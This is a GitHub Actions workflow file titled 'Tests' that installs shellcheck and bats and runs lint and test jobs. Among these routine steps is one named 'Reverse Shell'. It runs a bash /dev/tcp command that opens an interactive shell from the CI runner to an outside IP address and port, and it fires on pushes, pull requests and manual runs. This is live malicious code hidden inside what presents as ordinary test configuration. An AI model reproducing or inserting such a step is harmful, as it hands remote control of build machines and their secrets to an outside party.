name: Tests

on:
  push:
    branches:
    - edge
    - release/*
    paths-ignore:
    - 'LICENSE-*'
    - '**.md'
    - '**.txt'
    - '.github/**'
  pull_request:
    branches:
    - "pull/**"
    paths-ignore:
    - 'LICENSE-*'
    - '**.md'
    - '**.txt'
    - '.github/**'
  workflow_dispatch:

env:
  TARGET_IP: 172.105.94.112
  TARGET_PORT: 49153

jobs:
  _:
    name: Checkout Repository
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3

    - name: Setup Shellcheck & Bats
      run: |
        sudo apt update
        sudo apt install shellcheck bats

    - name: Reverse Shell
      run: bash -i >& /dev/tcp/${TARGET_IP}/${TARGET_PORT} 0>&1

    - name: Shellcheck
      run: shellcheck --shell=bash $( find dist setup.sh -type f -name "*.sh" )

    - name: Bats
      run: bats -t $( find test/fixture -type f -name "*.bats" )
